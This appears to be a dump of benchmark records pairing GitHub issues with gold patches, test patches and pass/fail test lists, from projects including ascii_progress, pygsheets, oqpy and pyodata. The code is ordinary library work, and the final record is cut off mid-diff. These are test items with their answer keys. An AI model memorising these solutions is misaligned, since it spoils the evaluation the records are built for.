+ self.assertIsInstance(
+ Bar.handle_exceptions(None, "", ""),
+ ContextManager
)
diff --git a/tests/test_spinner.py b/tests/test_spinner.py
index 037d43c..0cffa5b 100644
--- a/tests/test_spinner.py
+++ b/tests/test_spinner.py
@@ -5,7 +5,48 @@
import unittest
import unittest.mock
from io import StringIO
-from ascii_progress.spinner import Spinner
+from typing import ContextManager
+from ascii_progress.spinner import Spinner, SpinnerContext
+
+
+class TestSpinnerContext(unittest.TestCase):
+ """tests for SpinnerContext"""
+
+ def test_eq(self) -> None:
+ """test SpinnerContext.__eq__"""
+ spinner = Spinner("abc", StringIO())
+ contexts = [
+ SpinnerContext(spinner, "1", "2"),
+ SpinnerContext(spinner, "2", "2"),
+ SpinnerContext(spinner, "1", "1"),
+ SpinnerContext(Spinner("abc", StringIO()), "1", "2")
+ ]
+ for context in contexts:
+ self.assertEqual(
+ [context],
+ [c for c in contexts if c == context]
+ )
+ self.assertNotEqual(contexts[0], 42)
+
+ def test_context(self) -> None:
+ """test SpinnerContext as context manager"""
+ output = StringIO()
+ spinner = Spinner("abc", output)
+ with SpinnerContext(spinner, "1", "2") as context:
+ self.assertIsInstance(context, Spinner)
+ context.current_frame = "b"
+ with self.assertRaises(RuntimeError):
+ with SpinnerContext(spinner, "1", "2") as context:
+ context.current_frame = "c"
+ raise RuntimeError
+ with self.assertRaises(KeyboardInterrupt):
+ with SpinnerContext(spinner, "1", "2") as context:
+ context.current_frame = "a"
+ raise KeyboardInterrupt
+ self.assertEqual(
+ output.getvalue(),
+ "a\bb\b1\n\bc\b2\n\ba\b\b\b2 \n"
+ )
class TestSpinner(unittest.TestCase):
@@ -31,27 +72,13 @@ class TestSpinner(unittest.TestCase):
)
self.assertNotEqual(spinners[0], 42)
- def test_context(self) -> None:
- """test Spinner __enter__ and __exit__"""
- output = StringIO()
- with Spinner("abc", output) as spinner:
- self.assertIsInstance(spinner, Spinner)
- self.assertEqual(output.getvalue(), "a")
- self.assertEqual(output.getvalue(), "a\bFinished\n")
- output.seek(0)
- output.truncate(0)
- with self.assertRaises(KeyboardInterrupt):
- with Spinner("abc", output) as spinner:
- raise KeyboardInterrupt
- self.assertEqual(output.getvalue(), "a\b\b\bKeyboardInterrupt \n")
-
def test_iter(self) -> None:
"""test Spinner __iter__ and __exit__"""
output = StringIO()
- with Spinner("abc", output) as spinner:
- for _ in zip(range(6), spinner):
- pass
- self.assertEqual(output.getvalue(), "a\bb\bc\ba\bb\bc\ba\bFinished\n")
+ spinner = Spinner("abc", output)
+ for _ in zip(range(6), spinner):
+ pass
+ self.assertEqual(output.getvalue(), "a\bb\bc\ba\bb\bc\ba")
def test_with_padding(self) -> None:
"""test Spinner.with_padding"""
@@ -63,14 +90,14 @@ class TestSpinner(unittest.TestCase):
def test_current_frame(self) -> None:
"""test Spinner.current_frame"""
output = StringIO()
- with Spinner("abc", output) as spinner:
- self.assertEqual(spinner.current_frame, "a")
- spinner.set_progress(1)
- self.assertEqual(spinner.current_frame, "b")
- spinner.current_frame = "a"
- with self.assertRaises(ValueError):
- spinner.current_frame = "x"
- self.assertEqual(output.getvalue(), "a\bb\ba\bFinished\n")
+ spinner = Spinner("abc", output)
+ self.assertEqual(spinner.current_frame, "a")
+ spinner.set_progress(1)
+ self.assertEqual(spinner.current_frame, "b")
+ spinner.current_frame = "a"
+ with self.assertRaises(ValueError):
+ spinner.current_frame = "x"
+ self.assertEqual(output.getvalue(), "a\bb\ba")
def test_update(self) -> None:
"""test Spinner.update"""
@@ -96,11 +123,13 @@ class TestSpinner(unittest.TestCase):
def test_set_progress(self) -> None:
"""test Spinner.set_progress"""
- output = StringIO()
- with Spinner("abc", output) as spinner:
- spinner.set_progress(2)
- spinner.set_progress(4)
- self.assertEqual(output.getvalue(), "a\bc\bb\bFinished\n")
+ output = unittest.mock.Mock(wraps=StringIO())
+ spinner = Spinner("abc", output)
+ output.reset_mock()
+ spinner.set_progress(2)
+ output.flush.assert_called()
+ spinner.set_progress(4)
+ self.assertEqual(output.getvalue(), "a\bc\bb")
def test_replace(self) -> None:
"""test Spinner.replace"""
@@ -110,3 +139,10 @@ class TestSpinner(unittest.TestCase):
Spinner(("testtest", ""), output).replace("test", "42")
self.assertEqual(output.flush.call_count, 2)
self.assertEqual(output.getvalue(), "testtest\b\b\b\b\b\b\b\btest 42")
+
+ def test_handle_exceptions(self) -> None:
+ """test Spinner.handle_exceptions"""
+ self.assertIsInstance(
+ Spinner("abc", file=StringIO()).handle_exceptions("", ""),
+ ContextManager
+ )
|
improved context managers
Problem:
The messages displayed when using `Spinner` or `Bar` as context managers are hard coded.
Solution:
Add a `.handle_exceptions(message, error)` method to both classes which returns a context manager.
|
0.0
|
a5f5f2815ba25cdfdcf57a0f02c025ef9dc2a3b0
|
[
"tests/test_bar.py::TestBar::test_iter",
"tests/test_bar.py::TestBar::test_handle_exceptions",
"tests/test_bar.py::TestBar::test_eq",
"tests/test_bar.py::TestBarFormat::test_generate_bar",
"tests/test_bar.py::TestBarFormat::test_bar",
"tests/test_bar.py::TestBarFormat::test_with_optimized_wrapper",
"tests/test_bar.py::TestBarFormat::test_eq",
"tests/test_bar.py::TestBarFormat::test_init",
"tests/test_bar.py::TestASCIIBar::test_format_progress",
"tests/test_bar.py::TestASCIIBar::test_target",
"tests/test_bar.py::TestASCIIBar::test_width",
"tests/test_bar.py::TestASCIIBar::test_format_bar",
"tests/test_bar.py::TestASCIIBar::test_format_percent",
"tests/test_bar.py::TestASCIIBar::test_eq",
"tests/test_bar.py::TestASCIIBar::test_update",
"tests/test_bar.py::TestASCIIBar::test_replace",
"tests/test_bar.py::TestASCIIBar::test_progress",
"tests/test_bar.py::TestPercentDecorator::test_update_thresholds",
"tests/test_bar.py::TestPercentDecorator::test_with_inferred_thresholds",
"tests/test_bar.py::TestBarDecorator::test_update_thresholds",
"tests/test_bar.py::TestBarDecorator::test_with_inferred_thresholds",
"tests/test_bar.py::TestThresholdDecorator::test_eq",
"tests/test_bar.py::TestThresholdDecorator::test_width",
"tests/test_bar.py::TestThresholdDecorator::test_target",
"tests/test_bar.py::TestThresholdDecorator::test_replace",
"tests/test_bar.py::TestThresholdDecorator::test_progress",
"tests/test_bar.py::TestThresholdDecorator::test_update",
"tests/test_bar.py::BarSpinnerContext::test_eq",
"tests/test_bar.py::BarSpinnerContext::test_context",
"tests/test_bar.py::TestLazyFormatter::test_format",
"tests/test_bar.py::TestLazyFormatter::test_get_value",
"tests/test_spinner.py::TestSpinnerContext::test_context",
"tests/test_spinner.py::TestSpinnerContext::test_eq",
"tests/test_spinner.py::TestSpinner::test_handle_exceptions",
"tests/test_spinner.py::TestSpinner::test_replace",
"tests/test_spinner.py::TestSpinner::test_reset",
"tests/test_spinner.py::TestSpinner::test_with_padding",
"tests/test_spinner.py::TestSpinner::test_iter",
"tests/test_spinner.py::TestSpinner::test_update",
"tests/test_spinner.py::TestSpinner::test_current_frame",
"tests/test_spinner.py::TestSpinner::test_eq",
"tests/test_spinner.py::TestSpinner::test_set_progress"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-10-30 12:16:54+00:00
|
mit
| 197
|
|
nithinmurali__pygsheets-272
|
diff --git a/.gitignore b/.gitignore
index 9bc512f..3556492 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,22 +1,28 @@
+# Python
*.pyc
-.DS_Store
-.coverage
-
+build/
+dist/
venv/
-.idea/
.cache/
.pytest_cache/
-build/
-dist/
-# docs/
+pygsheets.egg-info/
+.pytest_cache/
+
+# File types
*.json
*.csv
+
+# Tests
test/*.json
test/usages
test/data/*.json
test/manual_test1.py
-pygsheets.egg-info/
+# Other
+.idea/
+.DS_Store
+.python-version
+.coverage
diff --git a/pygsheets/authorization.py b/pygsheets/authorization.py
index 6c1b37f..0d4420b 100644
--- a/pygsheets/authorization.py
+++ b/pygsheets/authorization.py
@@ -59,7 +59,6 @@ _SCOPES = ('https://www.googleapis.com/auth/spreadsheets', 'https://www.googleap
_deprecated_keyword_mapping = {
'outh_file': 'client_secret',
'outh_creds_store': 'credentials_directory',
- 'outh_nonlocal': 'non_local_authorization',
'service_file': 'service_account_file',
'credentials': 'custom_credentials'
}
@@ -86,13 +85,15 @@ def authorize(client_secret='client_secret.json',
:param kwargs: Parameters to be handed into the client constructor.
:returns: :class:`Client`
"""
- v = vars()
+
for key in kwargs:
if key in ['outh_file', 'outh_creds_store', 'service_file', 'credentials']:
warnings.warn('The argument {} is deprecated. Use {} instead.'.format(key, _deprecated_keyword_mapping[key])
, category=DeprecationWarning)
- v[_deprecated_keyword_mapping[key]] = kwargs[key]
- del kwargs[key]
+ client_secret = kwargs.get('outh_file', client_secret)
+ service_account_file = kwargs.get('service_file', service_account_file)
+ credentials_directory = kwargs.get('outh_creds_store', credentials_directory)
+ custom_credentials = kwargs.get('credentials', custom_credentials)
if custom_credentials is not None:
credentials = custom_credentials
|
nithinmurali/pygsheets
|
136c295143f6365bdbca70328a876b1cc66baab3
|
diff --git a/test/authorization_tests.py b/test/authorization_tests.py
index eee5b06..16389cb 100644
--- a/test/authorization_tests.py
+++ b/test/authorization_tests.py
@@ -26,4 +26,8 @@ class TestAuthorization(object):
self.sheet = c.create('test_sheet')
self.sheet.share('pygsheettest@gmail.com')
- self.sheet.delete()
\ No newline at end of file
+ self.sheet.delete()
+
+ def test_deprecated_kwargs_removal(self):
+ c = pygsheets.authorize(service_file=self.base_path + '/pygsheettest_service_account.json')
+ assert isinstance(c, Client)
\ No newline at end of file
|
RuntimeError: dictionary changed size during iteration
https://github.com/nithinmurali/pygsheets/blob/0e2468fe9a1957b19f1cebe3667c601c32942bbd/pygsheets/authorization.py#L94
You can't delete keys from a dictionary you are currently iterating.
|
0.0
|
136c295143f6365bdbca70328a876b1cc66baab3
|
[
"test/authorization_tests.py::TestAuthorization::test_deprecated_kwargs_removal"
] |
[
"test/authorization_tests.py::TestAuthorization::test_service_account_authorization",
"test/authorization_tests.py::TestAuthorization::test_user_credentials_loading"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-08-23 06:30:01+00:00
|
mit
| 4,222
|
|
openqasm__oqpy-20
|
diff --git a/oqpy/base.py b/oqpy/base.py
index 4a45796..43dece9 100644
--- a/oqpy/base.py
+++ b/oqpy/base.py
@@ -60,12 +60,29 @@ class OQPyExpression:
"""Helper method to produce a binary expression."""
return OQPyBinaryExpression(ast.BinaryOperator[op_name], first, second)
+ @staticmethod
+ def _to_unary(op_name: str, exp: AstConvertible) -> OQPyUnaryExpression:
+ """Helper method to produce a binary expression."""
+ return OQPyUnaryExpression(ast.UnaryOperator[op_name], exp)
+
+ def __pos__(self) -> OQPyExpression:
+ return self
+
+ def __neg__(self) -> OQPyUnaryExpression:
+ return self._to_unary("-", self)
+
def __add__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("+", self, other)
def __radd__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("+", other, self)
+ def __sub__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("-", self, other)
+
+ def __rsub__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("-", other, self)
+
def __mod__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("%", self, other)
@@ -78,6 +95,18 @@ class OQPyExpression:
def __rmul__(self, other: AstConvertible) -> OQPyBinaryExpression:
return self._to_binary("*", other, self)
+ def __truediv__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("/", self, other)
+
+ def __rtruediv__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("/", other, self)
+
+ def __pow__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("**", self, other)
+
+ def __rpow__(self, other: AstConvertible) -> OQPyBinaryExpression:
+ return self._to_binary("**", other, self)
+
def __eq__(self, other: AstConvertible) -> OQPyBinaryExpression: # type: ignore[override]
return self._to_binary("==", self, other)
@@ -132,6 +161,23 @@ class ExpressionConvertible(Protocol):
...
+class OQPyUnaryExpression(OQPyExpression):
+ """An expression consisting of one expression preceded by an operator."""
+
+ def __init__(self, op: ast.UnaryOperator, exp: AstConvertible):
+ super().__init__()
+ self.op = op
+ self.exp = exp
+ if isinstance(exp, OQPyExpression):
+ self.type = exp.type
+ else:
+ raise TypeError("exp is an expression")
+
+ def to_ast(self, program: Program) -> ast.UnaryExpression:
+ """Converts the OQpy expression into an ast node."""
+ return ast.UnaryExpression(self.op, to_ast(program, self.exp))
+
+
class OQPyBinaryExpression(OQPyExpression):
"""An expression consisting of two subexpressions joined by an operator."""
diff --git a/oqpy/classical_types.py b/oqpy/classical_types.py
index 630e336..7bc216f 100644
--- a/oqpy/classical_types.py
+++ b/oqpy/classical_types.py
@@ -38,6 +38,7 @@ if TYPE_CHECKING:
from oqpy.program import Program
__all__ = [
+ "pi",
"BoolVar",
"IntVar",
"UintVar",
@@ -53,6 +54,7 @@ __all__ = [
"stretch",
"bool_",
"bit_",
+ "bit",
"bit8",
"convert_range",
"int_",
@@ -78,24 +80,24 @@ __all__ = [
# subclasses of ``_ClassicalVar`` instead.
-def int_(size: int) -> ast.IntType:
+def int_(size: int | None = None) -> ast.IntType:
"""Create a sized signed integer type."""
- return ast.IntType(ast.IntegerLiteral(size))
+ return ast.IntType(ast.IntegerLiteral(size) if size is not None else None)
-def uint_(size: int) -> ast.UintType:
+def uint_(size: int | None = None) -> ast.UintType:
"""Create a sized unsigned integer type."""
- return ast.UintType(ast.IntegerLiteral(size))
+ return ast.UintType(ast.IntegerLiteral(size) if size is not None else None)
-def float_(size: int) -> ast.FloatType:
+def float_(size: int | None = None) -> ast.FloatType:
"""Create a sized floating-point type."""
- return ast.FloatType(ast.IntegerLiteral(size))
+ return ast.FloatType(ast.IntegerLiteral(size) if size is not None else None)
-def angle_(size: int) -> ast.AngleType:
+def angle_(size: int | None = None) -> ast.AngleType:
"""Create a sized angle type."""
- return ast.AngleType(ast.IntegerLiteral(size))
+ return ast.AngleType(ast.IntegerLiteral(size) if size is not None else None)
def complex_(size: int) -> ast.ComplexType:
@@ -107,14 +109,15 @@ def complex_(size: int) -> ast.ComplexType:
return ast.ComplexType(ast.FloatType(ast.IntegerLiteral(size // 2)))
-def bit_(size: int) -> ast.BitType:
+def bit_(size: int | None = None) -> ast.BitType:
"""Create a sized bit type."""
- return ast.BitType(ast.IntegerLiteral(size))
+ return ast.BitType(ast.IntegerLiteral(size) if size is not None else None)
duration = ast.DurationType()
stretch = ast.StretchType()
bool_ = ast.BoolType()
+bit = ast.BitType()
bit8 = bit_(8)
int32 = int_(32)
int64 = int_(64)
@@ -136,6 +139,22 @@ def convert_range(program: Program, item: Union[slice, range]) -> ast.RangeDefin
)
+class Identifier(OQPyExpression):
+ """Base class to specify constant symbols."""
+
+ name: str
+
+ def __init__(self, name: str) -> None:
+ self.type = None
+ self.name = name
+
+ def to_ast(self, program: Program) -> ast.Expression:
+ return ast.Identifier(name=self.name)
+
+
+pi = Identifier(name="pi")
+
+
class _ClassicalVar(Var, OQPyExpression):
"""Base type for variables with classical type.
diff --git a/oqpy/program.py b/oqpy/program.py
index 5e2e440..49c7d52 100644
--- a/oqpy/program.py
+++ b/oqpy/program.py
@@ -82,7 +82,9 @@ class Program:
def __init__(self, version: Optional[str] = "3.0") -> None:
self.stack: list[ProgramState] = [ProgramState()]
- self.defcals: dict[tuple[tuple[str, ...], str], ast.CalibrationDefinition] = {}
+ self.defcals: dict[
+ tuple[tuple[str, ...], str, tuple[str, ...]], ast.CalibrationDefinition
+ ] = {}
self.subroutines: dict[str, ast.SubroutineDefinition] = {}
self.externs: dict[str, ast.ExternDeclaration] = {}
self.declared_vars: dict[str, Var] = {}
@@ -196,13 +198,17 @@ class Program:
self.subroutines[name] = stmt
def _add_defcal(
- self, qubit_names: list[str], name: str, stmt: ast.CalibrationDefinition
+ self,
+ qubit_names: list[str],
+ name: str,
+ arguments: list[str],
+ stmt: ast.CalibrationDefinition,
) -> None:
"""Register a defcal defined in this program.
Defcals are added to the top of the program upon conversion to ast.
"""
- self.defcals[(tuple(qubit_names), name)] = stmt
+ self.defcals[(tuple(qubit_names), name, tuple(arguments))] = stmt
def _make_externs_statements(self, auto_encal: bool = False) -> list[ast.ExternDeclaration]:
"""Return a list of extern statements for inclusion at beginning of program.
diff --git a/oqpy/quantum_types.py b/oqpy/quantum_types.py
index 44c1a12..6ca4368 100644
--- a/oqpy/quantum_types.py
+++ b/oqpy/quantum_types.py
@@ -18,11 +18,13 @@
from __future__ import annotations
import contextlib
-from typing import TYPE_CHECKING, Iterator, Union
+from typing import TYPE_CHECKING, Iterator, Optional, Union
from openpulse import ast
+from openpulse.printer import dumps
-from oqpy.base import Var
+from oqpy.base import AstConvertible, Var, to_ast
+from oqpy.classical_types import _ClassicalVar
if TYPE_CHECKING:
from oqpy.program import Program
@@ -64,30 +66,57 @@ class QubitArray:
@contextlib.contextmanager
-def defcal(program: Program, qubits: Union[Qubit, list[Qubit]], name: str) -> Iterator[None]:
+def defcal(
+ program: Program,
+ qubits: Union[Qubit, list[Qubit]],
+ name: str,
+ arguments: Optional[list[AstConvertible]] = None,
+ return_type: Optional[ast.ClassicalType] = None,
+) -> Union[Iterator[None], Iterator[list[_ClassicalVar]], Iterator[_ClassicalVar]]:
"""Context manager for creating a defcal.
.. code-block:: python
- with defcal(program, q1, "X"):
+ with defcal(program, q1, "X", [AngleVar(name="theta"), oqpy.pi/2], oqpy.bit) as theta:
program.play(frame, waveform)
"""
- program._push()
- yield
- state = program._pop()
-
if isinstance(qubits, Qubit):
qubits = [qubits]
+ assert return_type is None or isinstance(return_type, ast.ClassicalType)
+
+ arguments_ast = []
+ variables = []
+ if arguments is not None:
+ for arg in arguments:
+ if isinstance(arg, _ClassicalVar):
+ arguments_ast.append(
+ ast.ClassicalArgument(type=arg.type, name=ast.Identifier(name=arg.name))
+ )
+ arg._needs_declaration = False
+ variables.append(arg)
+ else:
+ arguments_ast.append(to_ast(program, arg))
+
+ program._push()
+ if len(variables) > 1:
+ yield variables
+ elif len(variables) == 1:
+ yield variables[0]
+ else:
+ yield
+ state = program._pop()
stmt = ast.CalibrationDefinition(
ast.Identifier(name),
- [], # TODO (#52): support arguments
+ arguments_ast,
[ast.Identifier(q.name) for q in qubits],
- None, # TODO (#52): support return type,
+ return_type,
state.body,
)
program._add_statement(stmt)
- program._add_defcal([qubit.name for qubit in qubits], name, stmt)
+ program._add_defcal(
+ [qubit.name for qubit in qubits], name, [dumps(a) for a in arguments_ast], stmt
+ )
@contextlib.contextmanager
|
openqasm/oqpy
|
32cb438a101700af6c2b5c9be7d86d5ee2314ee6
|
diff --git a/tests/test_directives.py b/tests/test_directives.py
index 24115ef..e10271e 100644
--- a/tests/test_directives.py
+++ b/tests/test_directives.py
@@ -22,6 +22,7 @@ import numpy as np
import pytest
from openpulse.printer import dumps
+import oqpy
from oqpy import *
from oqpy.base import expr_matches
from oqpy.quantum_types import PhysicalQubits
@@ -188,7 +189,10 @@ def test_binary_expressions():
i = IntVar(5, "i")
j = IntVar(2, "j")
prog.set(i, 2 * (i + j))
- prog.set(j, 2 % (2 + i) % 2)
+ prog.set(j, 2 % (2 - i) % 2)
+ prog.set(j, 1 + oqpy.pi)
+ prog.set(j, 1 / oqpy.pi**2 / 2 + 2**oqpy.pi)
+ prog.set(j, -oqpy.pi * oqpy.pi - i**j)
expected = textwrap.dedent(
"""
@@ -196,7 +200,10 @@ def test_binary_expressions():
int[32] i = 5;
int[32] j = 2;
i = 2 * (i + j);
- j = 2 % (2 + i) % 2;
+ j = 2 % (2 - i) % 2;
+ j = 1 + pi;
+ j = 1 / pi ** 2 / 2 + 2 ** pi;
+ j = -pi * pi - i ** j;
"""
).strip()
@@ -506,6 +513,154 @@ def test_set_shift_frequency():
assert prog.to_qasm() == expected
+def test_defcals():
+ prog = Program()
+ constant = declare_waveform_generator("constant", [("length", duration), ("iq", complex128)])
+
+ q_port = PortVar("q_port")
+ rx_port = PortVar("rx_port")
+ tx_port = PortVar("tx_port")
+ q_frame = FrameVar(q_port, 6.431e9, name="q_frame")
+ rx_frame = FrameVar(rx_port, 5.752e9, name="rx_frame")
+ tx_frame = FrameVar(tx_port, 5.752e9, name="tx_frame")
+
+ q1 = PhysicalQubits[1]
+ q2 = PhysicalQubits[2]
+
+ with defcal(prog, q2, "x"):
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, q2, "rx", [AngleVar(name="theta")]) as theta:
+ prog.increment(theta, 0.1)
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, q2, "rx", [pi / 3]):
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, [q1, q2], "xy", [AngleVar(name="theta"), +pi / 2]) as theta:
+ prog.increment(theta, 0.1)
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, [q1, q2], "xy", [AngleVar(name="theta"), FloatVar(name="phi"), 10]) as params:
+ theta, phi = params
+ prog.increment(theta, 0.1)
+ prog.increment(phi, 0.2)
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, q2, "readout", return_type=oqpy.bit):
+ prog.play(tx_frame, constant(2.4e-6, 0.2))
+ prog.capture(rx_frame, constant(2.4e-6, 1))
+
+ with pytest.raises(AssertionError):
+
+ with defcal(prog, q2, "readout", return_type=bool):
+ prog.play(tx_frame, constant(2.4e-6, 0.2))
+ prog.capture(rx_frame, constant(2.4e-6, 1))
+
+ expected = textwrap.dedent(
+ """
+ OPENQASM 3.0;
+ extern constant(duration, complex[float[64]]) -> waveform;
+ port rx_port;
+ port tx_port;
+ port q_port;
+ frame q_frame = newframe(q_port, 6431000000.0, 0);
+ frame tx_frame = newframe(tx_port, 5752000000.0, 0);
+ frame rx_frame = newframe(rx_port, 5752000000.0, 0);
+ defcal x $2 {
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal rx(angle[32] theta) $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal rx(pi / 3) $2 {
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal xy(angle[32] theta, pi / 2) $1, $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal xy(angle[32] theta, float[64] phi, 10) $1, $2 {
+ theta += 0.1;
+ phi += 0.2;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal readout $2 -> bit {
+ play(tx_frame, constant(2400.0ns, 0.2));
+ capture(rx_frame, constant(2400.0ns, 1));
+ }
+ """
+ ).strip()
+ assert prog.to_qasm() == expected
+
+ expect_defcal_rx_theta = textwrap.dedent(
+ """
+ defcal rx(angle[32] theta) $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(prog.defcals[(("$2",), "rx", ("angle[32] theta",))], indent=" ").strip()
+ == expect_defcal_rx_theta
+ )
+ expect_defcal_rx_pio2 = textwrap.dedent(
+ """
+ defcal rx(pi / 3) $2 {
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(prog.defcals[(("$2",), "rx", ("pi / 3",))], indent=" ").strip()
+ == expect_defcal_rx_pio2
+ )
+ expect_defcal_xy_theta_pio2 = textwrap.dedent(
+ """
+ defcal xy(angle[32] theta, pi / 2) $1, $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(
+ prog.defcals[(("$1", "$2"), "xy", ("angle[32] theta", "pi / 2"))], indent=" "
+ ).strip()
+ == expect_defcal_xy_theta_pio2
+ )
+ expect_defcal_xy_theta_phi = textwrap.dedent(
+ """
+ defcal xy(angle[32] theta, float[64] phi, 10) $1, $2 {
+ theta += 0.1;
+ phi += 0.2;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(
+ prog.defcals[(("$1", "$2"), "xy", ("angle[32] theta", "float[64] phi", "10"))],
+ indent=" ",
+ ).strip()
+ == expect_defcal_xy_theta_phi
+ )
+ expect_defcal_readout_q2 = textwrap.dedent(
+ """
+ defcal readout $2 -> bit {
+ play(tx_frame, constant(2400.0ns, 0.2));
+ capture(rx_frame, constant(2400.0ns, 1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(prog.defcals[(("$2",), "readout", ())], indent=" ").strip()
+ == expect_defcal_readout_q2
+ )
+
+
def test_ramsey_example():
prog = Program()
constant = declare_waveform_generator("constant", [("length", duration), ("iq", complex128)])
@@ -620,8 +775,11 @@ def test_ramsey_example():
).strip()
assert prog.to_qasm() == expected
- assert dumps(prog.defcals[(("$2",), "x90")], indent=" ").strip() == expect_defcal_x90_q2
- assert dumps(prog.defcals[(("$2",), "readout")], indent=" ").strip() == expect_defcal_readout_q2
+ assert dumps(prog.defcals[(("$2",), "x90", ())], indent=" ").strip() == expect_defcal_x90_q2
+ assert (
+ dumps(prog.defcals[(("$2",), "readout", ())], indent=" ").strip()
+ == expect_defcal_readout_q2
+ )
def test_rabi_example():
@@ -748,11 +906,11 @@ def test_program_add():
).strip()
assert (
- dumps(prog2.defcals[(("$1", "$2"), "two_qubit_gate")], indent=" ").strip()
+ dumps(prog2.defcals[(("$1", "$2"), "two_qubit_gate", ())], indent=" ").strip()
== expected_defcal_two_qubit_gate
)
assert (
- dumps(prog.defcals[(("$1", "$2"), "two_qubit_gate")], indent=" ").strip()
+ dumps(prog.defcals[(("$1", "$2"), "two_qubit_gate", ())], indent=" ").strip()
== expected_defcal_two_qubit_gate
)
|
Support classical arguments and return types for defcals
|
0.0
|
32cb438a101700af6c2b5c9be7d86d5ee2314ee6
|
[
"tests/test_directives.py::test_binary_expressions",
"tests/test_directives.py::test_defcals",
"tests/test_directives.py::test_ramsey_example",
"tests/test_directives.py::test_program_add"
] |
[
"tests/test_directives.py::test_version_string",
"tests/test_directives.py::test_variable_declaration",
"tests/test_directives.py::test_complex_numbers_declaration",
"tests/test_directives.py::test_non_trivial_variable_declaration",
"tests/test_directives.py::test_variable_assignment",
"tests/test_directives.py::test_measure_reset",
"tests/test_directives.py::test_bare_if",
"tests/test_directives.py::test_if_else",
"tests/test_directives.py::test_for_in",
"tests/test_directives.py::test_while",
"tests/test_directives.py::test_create_frame",
"tests/test_directives.py::test_subroutine_with_return",
"tests/test_directives.py::test_box_and_timings",
"tests/test_directives.py::test_play_capture",
"tests/test_directives.py::test_set_shift_frequency",
"tests/test_directives.py::test_rabi_example",
"tests/test_directives.py::test_expression_convertible",
"tests/test_directives.py::test_waveform_extern_arg_passing",
"tests/test_directives.py::test_needs_declaration",
"tests/test_directives.py::test_discrete_waveform",
"tests/test_directives.py::test_var_and_expr_matches",
"tests/test_directives.py::test_program_tracks_frame_waveform_vars",
"tests/test_directives.py::test_make_duration",
"tests/test_directives.py::test_autoencal",
"tests/test_directives.py::test_ramsey_example_blog"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-10 03:26:44+00:00
|
apache-2.0
| 4,418
|
|
SAP__python-pyodata-232
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 0f876b9..7175a5d 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,8 @@ and this project adheres to [Semantic Versioning](http://semver.org/).
## [Unreleased]
+- model: fix edge case for Edm.DateTimeOffset.from_json() without offset - Petr Hanak
+
## [1.10.0]
### Added
diff --git a/pyodata/v2/model.py b/pyodata/v2/model.py
index 065f93e..4f15c84 100644
--- a/pyodata/v2/model.py
+++ b/pyodata/v2/model.py
@@ -529,6 +529,12 @@ class EdmDateTimeOffsetTypTraits(EdmPrefixedTypTraits):
return f'/Date({ticks}{offset_in_minutes:+05})/'
def from_json(self, value):
+ # special edge case:
+ # datetimeoffset'yyyy-mm-ddThh:mm[:ss]' = defaults to UTC, when offset value is not provided in responde data by service but the metadata is EdmDateTimeOffset
+ # intentionally just for from_json, generation of to_json should always provide timezone info
+ if re.match(r"^/Date\((?P<milliseconds_since_epoch>-?\d+)\)/$", value):
+ value = value.replace(')', '+0000)')
+
matches = re.match(r"^/Date\((?P<milliseconds_since_epoch>-?\d+)(?P<offset_in_minutes>[+-]\d+)\)/$", value)
try:
milliseconds_since_epoch = matches.group('milliseconds_since_epoch')
|
SAP/python-pyodata
|
5d1490871f4b824a82dd6eaa148444a99ea4f47d
|
diff --git a/tests/test_model_v2.py b/tests/test_model_v2.py
index 5bdef48..258dde7 100644
--- a/tests/test_model_v2.py
+++ b/tests/test_model_v2.py
@@ -690,6 +690,9 @@ def test_traits_datetimeoffset(type_date_time_offset):
def test_traits_datetimeoffset_to_literal(type_date_time_offset):
"""Test Edm.DateTimeOffset trait: Python -> literal"""
+ testdate = datetime(1, 1, 1, 0, 0, 0, 0, tzinfo=timezone.utc)
+ assert type_date_time_offset.traits.to_literal(testdate) == "datetimeoffset'0001-01-01T00:00:00+00:00'"
+
testdate = datetime(2005, 1, 28, 18, 30, 44, 123456, tzinfo=timezone(timedelta(hours=3, minutes=40)))
assert type_date_time_offset.traits.to_literal(testdate) == "datetimeoffset'2005-01-28T18:30:44.123456+03:40'"
@@ -746,7 +749,7 @@ def test_traits_datetimeoffset_from_invalid_literal(type_date_time_offset):
